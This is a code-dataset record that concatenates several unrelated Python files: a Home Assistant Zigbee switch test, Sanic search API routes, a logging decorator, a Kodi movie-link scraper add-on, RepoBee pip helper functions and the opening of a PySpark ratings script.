152997e7589d3bad63181ca78cc296f54ae25aa2
|
[
"Apache-2.0"
] | null | null | null |
tests/components/zha/test_switch.py
|
Squixx/home-assistant
|
152997e7589d3bad63181ca78cc296f54ae25aa2
|
[
"Apache-2.0"
] | null | null | null |
"""Test zha switch."""
from unittest.mock import call, patch
import pytest
import zigpy.zcl.clusters.general as general
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.switch import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
find_entity_id,
make_attribute,
make_zcl_header,
)
from tests.common import mock_coro
ON = 1
OFF = 0
@pytest.fixture
def zigpy_device(zigpy_device_mock):
"""Device tracker zigpy device."""
endpoints = {
1: {
"in_clusters": [general.Basic.cluster_id, general.OnOff.cluster_id],
"out_clusters": [],
"device_type": 0,
}
}
return zigpy_device_mock(endpoints)
async def test_switch(hass, zha_gateway, zha_device_joined_restored, zigpy_device):
"""Test zha switch platform."""
zha_device = await zha_device_joined_restored(zigpy_device)
cluster = zigpy_device.endpoints.get(1).on_off
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
assert entity_id is not None
# test that the switch was created and that its state is unavailable
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and device
await async_enable_traffic(hass, zha_gateway, [zha_device])
# test that the state has changed from unavailable to off
assert hass.states.get(entity_id).state == STATE_OFF
# turn on at switch
attr = make_attribute(0, 1)
hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# turn off at switch
attr.value.value = 0
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
# turn on from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x00, zcl_f.Status.SUCCESS]),
):
# turn on via UI
await hass.services.async_call(
DOMAIN, "turn_on", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, ON, (), expect_reply=True, manufacturer=None
)
# turn off from HA
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x01, zcl_f.Status.SUCCESS]),
):
# turn off via UI
await hass.services.async_call(
DOMAIN, "turn_off", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, OFF, (), expect_reply=True, manufacturer=None
)
# test joining a new switch to the network and HA
cluster.bind.reset_mock()
cluster.configure_reporting.reset_mock()
await zha_gateway.async_device_initialized(zigpy_device)
await hass.async_block_till_done()
assert cluster.bind.call_count == 1
assert cluster.bind.await_count == 1
assert cluster.configure_reporting.call_count == 1
assert cluster.configure_reporting.await_count == 1
| 31.615385
| 83
| 0.687956
|
from unittest.mock import call, patch
import pytest
import zigpy.zcl.clusters.general as general
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.switch import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
find_entity_id,
make_attribute,
make_zcl_header,
)
from tests.common import mock_coro
ON = 1
OFF = 0
@pytest.fixture
def zigpy_device(zigpy_device_mock):
endpoints = {
1: {
"in_clusters": [general.Basic.cluster_id, general.OnOff.cluster_id],
"out_clusters": [],
"device_type": 0,
}
}
return zigpy_device_mock(endpoints)
async def test_switch(hass, zha_gateway, zha_device_joined_restored, zigpy_device):
zha_device = await zha_device_joined_restored(zigpy_device)
cluster = zigpy_device.endpoints.get(1).on_off
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
assert entity_id is not None
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
await async_enable_traffic(hass, zha_gateway, [zha_device])
assert hass.states.get(entity_id).state == STATE_OFF
attr = make_attribute(0, 1)
hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
attr.value.value = 0
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x00, zcl_f.Status.SUCCESS]),
):
await hass.services.async_call(
DOMAIN, "turn_on", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, ON, (), expect_reply=True, manufacturer=None
)
with patch(
"zigpy.zcl.Cluster.request",
return_value=mock_coro([0x01, zcl_f.Status.SUCCESS]),
):
await hass.services.async_call(
DOMAIN, "turn_off", {"entity_id": entity_id}, blocking=True
)
assert len(cluster.request.mock_calls) == 1
assert cluster.request.call_args == call(
False, OFF, (), expect_reply=True, manufacturer=None
)
cluster.bind.reset_mock()
cluster.configure_reporting.reset_mock()
await zha_gateway.async_device_initialized(zigpy_device)
await hass.async_block_till_done()
assert cluster.bind.call_count == 1
assert cluster.bind.await_count == 1
assert cluster.configure_reporting.call_count == 1
assert cluster.configure_reporting.await_count == 1
| true
| true
|
f7053ab01509c24ced03b369dae6ac255d9ca094
| 4,288
|
py
|
Python
|
dp_conceptual_search/api/search/routes.py
|
flaxandteal/dp-conceptual-search
|
16c6383a61ba5b7069337c2626a0dc243bfe9d35
|
[
"MIT"
] | null | null | null |
dp_conceptual_search/api/search/routes.py
|
flaxandteal/dp-conceptual-search
|
16c6383a61ba5b7069337c2626a0dc243bfe9d35
|
[
"MIT"
] | null | null | null |
dp_conceptual_search/api/search/routes.py
|
flaxandteal/dp-conceptual-search
|
16c6383a61ba5b7069337c2626a0dc243bfe9d35
|
[
"MIT"
] | null | null | null |
"""
This file contains all routes for the /search API
"""
from sanic import Blueprint
from sanic.response import HTTPResponse
from dp4py_sanic.api.response.json_response import json
from dp_conceptual_search.config import CONFIG
from dp_conceptual_search.api.request import ONSRequest
from dp_conceptual_search.ons.search.index import Index
from dp_conceptual_search.ons.search.client.search_engine import SearchEngine
from dp_conceptual_search.ons.search.response.search_result import SearchResult
from dp_conceptual_search.api.search.sanic_search_engine import SanicSearchEngine
from dp_conceptual_search.api.search.conceptual import routes as conceptual_routes
search_blueprint = Blueprint('search', url_prefix='/search')
@search_blueprint.route('/departments', methods=['GET'], strict_slashes=True)
async def ons_departments_query(request: ONSRequest) -> HTTPResponse:
"""
Handles departments queries to the departments index
:param request:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.DEPARTMENTS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.departments_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/', methods=['GET', 'POST'], strict_slashes=False)
async def search(request: ONSRequest) -> HTTPResponse:
"""
API which combines the content, counts and featured result queries into one
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.search(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
result = await sanic_search_engine.search(request)
return json(request, result, 200)
@search_blueprint.route('/content', methods=['GET', 'POST'], strict_slashes=True)
async def ons_content_query(request: ONSRequest) -> HTTPResponse:
"""
Handles content queries to the API.
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_content_query(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.content_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/counts', methods=['GET', 'POST'], strict_slashes=True)
async def ons_counts_query(request: ONSRequest) -> HTTPResponse:
"""
Handles type counts queries to the API.
:param request:
:return:
"""
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_counts_query(request)
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.type_counts_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/featured', methods=['GET'], strict_slashes=True)
async def ons_featured_result_query(request: ONSRequest) -> HTTPResponse:
"""
Handles featured result queries (i.e product and home page census pages)
:param request:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.featured_result_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/uri/', methods=['GET', 'POST'])
@search_blueprint.route('/uri/<path:path>', methods=['GET', 'POST'])
async def search_by_uri(request: ONSRequest, path: str):
"""
Search for a page by it's uri
:param request:
:param path:
:return:
"""
# Initialise the search engine
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
# Perform the request
search_result: SearchResult = await sanic_search_engine.search_by_uri(request, path)
return json(request, search_result.to_dict(), 200)
| 34.304
| 90
| 0.752332
|
from sanic import Blueprint
from sanic.response import HTTPResponse
from dp4py_sanic.api.response.json_response import json
from dp_conceptual_search.config import CONFIG
from dp_conceptual_search.api.request import ONSRequest
from dp_conceptual_search.ons.search.index import Index
from dp_conceptual_search.ons.search.client.search_engine import SearchEngine
from dp_conceptual_search.ons.search.response.search_result import SearchResult
from dp_conceptual_search.api.search.sanic_search_engine import SanicSearchEngine
from dp_conceptual_search.api.search.conceptual import routes as conceptual_routes
search_blueprint = Blueprint('search', url_prefix='/search')
@search_blueprint.route('/departments', methods=['GET'], strict_slashes=True)
async def ons_departments_query(request: ONSRequest) -> HTTPResponse:
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.DEPARTMENTS)
search_result: SearchResult = await sanic_search_engine.departments_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/', methods=['GET', 'POST'], strict_slashes=False)
async def search(request: ONSRequest) -> HTTPResponse:
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.search(request)
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
result = await sanic_search_engine.search(request)
return json(request, result, 200)
@search_blueprint.route('/content', methods=['GET', 'POST'], strict_slashes=True)
async def ons_content_query(request: ONSRequest) -> HTTPResponse:
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_content_query(request)
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
search_result: SearchResult = await sanic_search_engine.content_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/counts', methods=['GET', 'POST'], strict_slashes=True)
async def ons_counts_query(request: ONSRequest) -> HTTPResponse:
if CONFIG.API.redirect_conceptual_search:
return await conceptual_routes.conceptual_counts_query(request)
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
search_result: SearchResult = await sanic_search_engine.type_counts_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/featured', methods=['GET'], strict_slashes=True)
async def ons_featured_result_query(request: ONSRequest) -> HTTPResponse:
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
search_result: SearchResult = await sanic_search_engine.featured_result_query(request)
return json(request, search_result.to_dict(), 200)
@search_blueprint.route('/uri/', methods=['GET', 'POST'])
@search_blueprint.route('/uri/<path:path>', methods=['GET', 'POST'])
async def search_by_uri(request: ONSRequest, path: str):
sanic_search_engine = SanicSearchEngine(request.app, SearchEngine, Index.ONS)
search_result: SearchResult = await sanic_search_engine.search_by_uri(request, path)
return json(request, search_result.to_dict(), 200)
| true
| true
|
f7053bc53f930cd972b3fb116080db388c2bf1b4
| 562
|
py
|
Python
|
common_utils/log_decorator.py
|
beansKingdom/CommonUtils
|
85f658671ddc6d52dc65e8d8c8bec5474a97a19f
|
[
"MIT"
] | null | null | null |
common_utils/log_decorator.py
|
beansKingdom/CommonUtils
|
85f658671ddc6d52dc65e8d8c8bec5474a97a19f
|
[
"MIT"
] | 4
|
2020-03-24T17:40:50.000Z
|
2021-06-02T00:25:27.000Z
|
common_utils/log_decorator.py
|
beansKingdom/CommonUtils
|
85f658671ddc6d52dc65e8d8c8bec5474a97a19f
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
from common_utils.new_log import NewLog
class LogDecorator:
log = NewLog(__name__)
logger = log.get_log()
def __call__(self, func):
def wrapper(*args, **kw):
self.logger.debug("call method %s ===============" % func.__name__)
self.logger.debug("method [%s] input args: [%s], kw: [%s]" % (func.__name__, args, kw))
result = func(*args, **kw)
self.logger.debug("method [%s] response: [%s]" % (func.__name__, result))
return result
return wrapper
| 29.578947
| 100
| 0.553381
|
from common_utils.new_log import NewLog
class LogDecorator:
log = NewLog(__name__)
logger = log.get_log()
def __call__(self, func):
def wrapper(*args, **kw):
self.logger.debug("call method %s ===============" % func.__name__)
self.logger.debug("method [%s] input args: [%s], kw: [%s]" % (func.__name__, args, kw))
result = func(*args, **kw)
self.logger.debug("method [%s] response: [%s]" % (func.__name__, result))
return result
return wrapper
| true
| true
|
f7053c939c0ae2e74aeebb8a418132b816d2cc31
| 6,017
|
py
|
Python
|
lib/lambdascrapers/sources_incursion/en_incursion-1.20(final)/ultrahd.py
|
proxium/script.module.lambdascrapers
|
f96ad4c7c44c011c9d0007a83edde8c4797e0e2f
|
[
"Beerware"
] | 11
|
2018-12-21T22:52:37.000Z
|
2021-09-02T02:13:50.000Z
|
lib/lambdascrapers/sources_incursion/en_incursion-1.20(final)/ultrahd.py
|
proxium/script.module.lambdascrapers
|
f96ad4c7c44c011c9d0007a83edde8c4797e0e2f
|
[
"Beerware"
] | null | null | null |
lib/lambdascrapers/sources_incursion/en_incursion-1.20(final)/ultrahd.py
|
proxium/script.module.lambdascrapers
|
f96ad4c7c44c011c9d0007a83edde8c4797e0e2f
|
[
"Beerware"
] | 1
|
2020-02-01T19:52:36.000Z
|
2020-02-01T19:52:36.000Z
|
# -*- coding: utf-8 -*-
'''
Covenant Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['ultrahdindir.com']
self.base_link = 'http://ultrahdindir.com'
self.post_link = '/index.php?do=search'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if debrid.status() is False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['title'].replace(':','').lower()
year = data['year']
query = '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = urlparse.urljoin(self.base_link, self.post_link)
post = 'do=search&subaction=search&search_start=0&full_search=0&result_from=1&story=%s' % urllib.quote_plus(query)
r = client.request(url, post=post)
r = client.parseDOM(r, 'div', attrs={'class': 'box-out margin'})
r = [(dom_parser2.parse_dom(i, 'div', attrs={'class':'news-title'})) for i in r if data['imdb'] in i]
r = [(dom_parser2.parse_dom(i[0], 'a', req='href')) for i in r if i]
r = [(i[0].attrs['href'], i[0].content) for i in r if i]
hostDict = hostprDict + hostDict
for item in r:
try:
name = item[1]
y = re.findall('\((\d{4})\)', name)[0]
if not y == year: raise Exception()
s = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', name)
s = s[0] if s else '0'
data = client.request(item[0])
data = dom_parser2.parse_dom(data, 'div', attrs={'id': 'r-content'})
data = re.findall('\s*<b><a href=.+?>(.+?)</b>.+?<u><b><a href="(.+?)".+?</a></b></u>',
data[0].content, re.DOTALL)
u = [(i[0], i[1], s) for i in data if i]
for name, url, size in u:
try:
if '4K' in name:
quality = '4K'
elif '1080p' in name:
quality = '1080p'
elif '720p' in name:
quality = '720p'
elif any(i in ['dvdscr', 'r5', 'r6'] for i in name):
quality = 'SCR'
elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts']
for i in name):
quality = 'CAM'
else: quality = '720p'
info = []
if '3D' in name or '.3D.' in url: info.append('3D'); quality = '1080p'
if any(i in ['hevc', 'h265', 'x265'] for i in name): info.append('HEVC')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', size)[-1]
div = 1 if size.endswith(('Gb', 'GiB', 'GB')) else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size)) / div
size = '%.2f GB' % size
info.append(size)
except:
pass
info = ' | '.join(info)
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
if any(x in url for x in ['.rar', '.zip', '.iso', 'turk']):continue
if 'ftp' in url: host = 'COV'; direct = True;
else: direct = False; host= 'turbobit.net'
#if not host in hostDict: continue
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'language': 'en',
'url': url, 'info': info, 'direct': direct, 'debridonly': True})
except:
pass
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
| 41.784722
| 127
| 0.442081
|
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['ultrahdindir.com']
self.base_link = 'http://ultrahdindir.com'
self.post_link = '/index.php?do=search'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if debrid.status() is False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['title'].replace(':','').lower()
year = data['year']
query = '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = urlparse.urljoin(self.base_link, self.post_link)
post = 'do=search&subaction=search&search_start=0&full_search=0&result_from=1&story=%s' % urllib.quote_plus(query)
r = client.request(url, post=post)
r = client.parseDOM(r, 'div', attrs={'class': 'box-out margin'})
r = [(dom_parser2.parse_dom(i, 'div', attrs={'class':'news-title'})) for i in r if data['imdb'] in i]
r = [(dom_parser2.parse_dom(i[0], 'a', req='href')) for i in r if i]
r = [(i[0].attrs['href'], i[0].content) for i in r if i]
hostDict = hostprDict + hostDict
for item in r:
try:
name = item[1]
y = re.findall('\((\d{4})\)', name)[0]
if not y == year: raise Exception()
s = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', name)
s = s[0] if s else '0'
data = client.request(item[0])
data = dom_parser2.parse_dom(data, 'div', attrs={'id': 'r-content'})
data = re.findall('\s*<b><a href=.+?>(.+?)</b>.+?<u><b><a href="(.+?)".+?</a></b></u>',
data[0].content, re.DOTALL)
u = [(i[0], i[1], s) for i in data if i]
for name, url, size in u:
try:
if '4K' in name:
quality = '4K'
elif '1080p' in name:
quality = '1080p'
elif '720p' in name:
quality = '720p'
elif any(i in ['dvdscr', 'r5', 'r6'] for i in name):
quality = 'SCR'
elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts']
for i in name):
quality = 'CAM'
else: quality = '720p'
info = []
if '3D' in name or '.3D.' in url: info.append('3D'); quality = '1080p'
if any(i in ['hevc', 'h265', 'x265'] for i in name): info.append('HEVC')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', size)[-1]
div = 1 if size.endswith(('Gb', 'GiB', 'GB')) else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size)) / div
size = '%.2f GB' % size
info.append(size)
except:
pass
info = ' | '.join(info)
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
if any(x in url for x in ['.rar', '.zip', '.iso', 'turk']):continue
if 'ftp' in url: host = 'COV'; direct = True;
else: direct = False; host= 'turbobit.net'
#if not host in hostDict: continue
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'language': 'en',
'url': url, 'info': info, 'direct': direct, 'debridonly': True})
except:
pass
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
| true
| true
|
f7053cb96e078cbb641803774c57e3d6c47395cc
| 5,903
|
py
|
Python
|
src/_repobee/disthelpers.py
|
tohanss/repobee
|
cf5eb1e83e62c20bbca00c8ad9f798a612e1664f
|
[
"MIT"
] | null | null | null |
src/_repobee/disthelpers.py
|
tohanss/repobee
|
cf5eb1e83e62c20bbca00c8ad9f798a612e1664f
|
[
"MIT"
] | null | null | null |
src/_repobee/disthelpers.py
|
tohanss/repobee
|
cf5eb1e83e62c20bbca00c8ad9f798a612e1664f
|
[
"MIT"
] | null | null | null |
"""Helper functions for the distribution."""
import importlib
import json
import pathlib
import subprocess
import sys
import types
import os
from typing import Optional, List
import requests
import repobee_plug as plug
import _repobee.ext
from _repobee import distinfo
from _repobee import plugin
class DependencyResolutionError(plug.PlugError):
"""Raise when dependency resolution fails during an install."""
def get_installed_plugins_path() -> pathlib.Path:
"""Return the path to the installed_plugins.json file."""
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "installed_plugins.json"
def get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> dict:
"""Return the public content of the installed_plugins.json file."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
if "_metainfo" in installed_plugins:
del installed_plugins["_metainfo"]
return installed_plugins
def _get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
):
"""Return the content of the installed_plugins.json file, with metainfo."""
return json.loads(
(installed_plugins_path or get_installed_plugins_path()).read_text(
"utf8"
)
)
def write_installed_plugins(
installed_plugins: dict,
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
"""Write the installed_plugins.json file."""
path = installed_plugins_path or get_installed_plugins_path()
metainfo = _get_installed_plugins(path).get("_metainfo") or {}
metainfo.update(installed_plugins.get("_metainfo") or {})
installed_plugins_write = dict(installed_plugins)
installed_plugins_write["_metainfo"] = metainfo
path.write_text(
json.dumps(installed_plugins_write, indent=4), encoding="utf8"
)
def get_active_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> List[str]:
"""Read active plugins from the installed_plugins.json file."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
return (installed_plugins.get("_metainfo") or {}).get(
"active_plugins"
) or []
def write_active_plugins(
active_plugins: List[str],
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
"""Write the active plugins."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
installed_plugins.setdefault("_metainfo", {})[
"active_plugins"
] = active_plugins
write_installed_plugins(installed_plugins, installed_plugins_path)
def get_pip_path() -> pathlib.Path:
"""Return the path to the installed pip binary."""
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "env" / "bin" / "pip"
def get_plugins_json(url: str = "https://repobee.org/plugins.json") -> dict:
"""Fetch and parse the plugins.json file.
Args:
url: URL to the plugins.json file.
Returns:
A dictionary with the contents of the plugins.json file.
"""
resp = requests.get(url)
if resp.status_code != 200:
plug.log.error(resp.content.decode("utf8"))
raise plug.PlugError(f"could not fetch plugins.json from '{url}'")
return resp.json()
def get_builtin_plugins(ext_pkg: types.ModuleType = _repobee.ext) -> dict:
"""Returns a dictionary of builting plugins on the same form as the
plugins.json dict.
"""
def _get_plugin_description(name):
return (
importlib.import_module(f"{ext_pkg.__name__}.{name}").__dict__.get(
"PLUGIN_DESCRIPTION"
)
or "-"
)
return {
name: dict(
description=_get_plugin_description(name),
url=f"https://repobee.readthedocs.io/"
f"en/stable/builtins.html#{name}",
versions={"N/A": {}},
builtin=True,
)
for name in plugin.get_module_names(ext_pkg)
}
def pip(command: str, *args, **kwargs) -> subprocess.CompletedProcess:
"""Thin wrapper around the ``pip`` executable in the distribution's virtual
environment.
Args:
command: The command to execute (e.g. "install" or "list").
args: Positional arguments to ``pip``, passed in order. Flags should
also be passed here (e.g. `--pre`)
kwargs: Keyword arguments to ``pip``, passed as ``--key value`` to the
CLI. If the value is ``True``, the argument is passed as a flag,
i.e. as ``--key``.
Returns:
True iff the command exited with a zero exit status.
Raises:
DependencyResolutionError: If the 2020-resolver encounters fails to
resolve dependencies.
"""
cli_kwargs = [
f"--{key.replace('_', '-')}"
# True is interpreted as a flag
+ (f"={val}" if val is not True else "")
for key, val in kwargs.items()
]
env = dict(os.environ)
if command == "install":
# the resolver allows us to avoid installing plugins that are
# incompatible with the current version of RepoBee
cli_kwargs.append("--use-feature=2020-resolver")
# REPOBEE_INSTALL_DIR must be available when upgrading RepoBee,
# or the dist plugins aren't activated
env["REPOBEE_INSTALL_DIR"] = str(distinfo.INSTALL_DIR)
# due to the hack in setup.py to edit the distinfo, we must build
# RepoBee from source
cli_kwargs.append("--no-binary=repobee")
cmd = [str(get_pip_path()), command, *args, *cli_kwargs]
proc = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env
)
if proc.returncode != 0:
stderr = proc.stderr.decode(sys.getdefaultencoding())
plug.log.error(stderr)
if "ResolutionImpossible" in stderr:
raise DependencyResolutionError()
return proc
| 32.256831
| 79
| 0.671015
|
import importlib
import json
import pathlib
import subprocess
import sys
import types
import os
from typing import Optional, List
import requests
import repobee_plug as plug
import _repobee.ext
from _repobee import distinfo
from _repobee import plugin
class DependencyResolutionError(plug.PlugError):
def get_installed_plugins_path() -> pathlib.Path:
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "installed_plugins.json"
def get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> dict:
installed_plugins = _get_installed_plugins(installed_plugins_path)
if "_metainfo" in installed_plugins:
del installed_plugins["_metainfo"]
return installed_plugins
def _get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
):
return json.loads(
(installed_plugins_path or get_installed_plugins_path()).read_text(
"utf8"
)
)
def write_installed_plugins(
installed_plugins: dict,
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
path = installed_plugins_path or get_installed_plugins_path()
metainfo = _get_installed_plugins(path).get("_metainfo") or {}
metainfo.update(installed_plugins.get("_metainfo") or {})
installed_plugins_write = dict(installed_plugins)
installed_plugins_write["_metainfo"] = metainfo
path.write_text(
json.dumps(installed_plugins_write, indent=4), encoding="utf8"
)
def get_active_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> List[str]:
installed_plugins = _get_installed_plugins(installed_plugins_path)
return (installed_plugins.get("_metainfo") or {}).get(
"active_plugins"
) or []
def write_active_plugins(
active_plugins: List[str],
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
installed_plugins = _get_installed_plugins(installed_plugins_path)
installed_plugins.setdefault("_metainfo", {})[
"active_plugins"
] = active_plugins
write_installed_plugins(installed_plugins, installed_plugins_path)
def get_pip_path() -> pathlib.Path:
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "env" / "bin" / "pip"
def get_plugins_json(url: str = "https://repobee.org/plugins.json") -> dict:
resp = requests.get(url)
if resp.status_code != 200:
plug.log.error(resp.content.decode("utf8"))
raise plug.PlugError(f"could not fetch plugins.json from '{url}'")
return resp.json()
def get_builtin_plugins(ext_pkg: types.ModuleType = _repobee.ext) -> dict:
def _get_plugin_description(name):
return (
importlib.import_module(f"{ext_pkg.__name__}.{name}").__dict__.get(
"PLUGIN_DESCRIPTION"
)
or "-"
)
return {
name: dict(
description=_get_plugin_description(name),
url=f"https://repobee.readthedocs.io/"
f"en/stable/builtins.html#{name}",
versions={"N/A": {}},
builtin=True,
)
for name in plugin.get_module_names(ext_pkg)
}
def pip(command: str, *args, **kwargs) -> subprocess.CompletedProcess:
cli_kwargs = [
f"--{key.replace('_', '-')}"
+ (f"={val}" if val is not True else "")
for key, val in kwargs.items()
]
env = dict(os.environ)
if command == "install":
cli_kwargs.append("--use-feature=2020-resolver")
env["REPOBEE_INSTALL_DIR"] = str(distinfo.INSTALL_DIR)
# due to the hack in setup.py to edit the distinfo, we must build
# RepoBee from source
cli_kwargs.append("--no-binary=repobee")
cmd = [str(get_pip_path()), command, *args, *cli_kwargs]
proc = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env
)
if proc.returncode != 0:
stderr = proc.stderr.decode(sys.getdefaultencoding())
plug.log.error(stderr)
if "ResolutionImpossible" in stderr:
raise DependencyResolutionError()
return proc
| true
| true
|
f7053dfef19a421a63c39a67f749f72d485326f3
| 440
|
py
|
Python
|
ratings-counter.py
|
csagar131/pyspark-scripts
|
7357baa1dc5499149e4e1041768827eee6209804
|
[
"Apache-2.0"
] | null | null | null |
ratings-counter.py
|
csagar131/pyspark-scripts
|
7357baa1dc5499149e4e1041768827eee6209804
|
[
"Apache-2.0"
] | null | null | null |
ratings-counter.py
|
csagar131/pyspark-scripts
|
7357baa1dc5499149e4e1041768827eee6209804
|
[
"Apache-2.0"
] | null | null | null |
from pyspark import SparkConf, SparkContext
import collections
conf = SparkConf().setMaster("local").setAppName("RatingsHistogram")
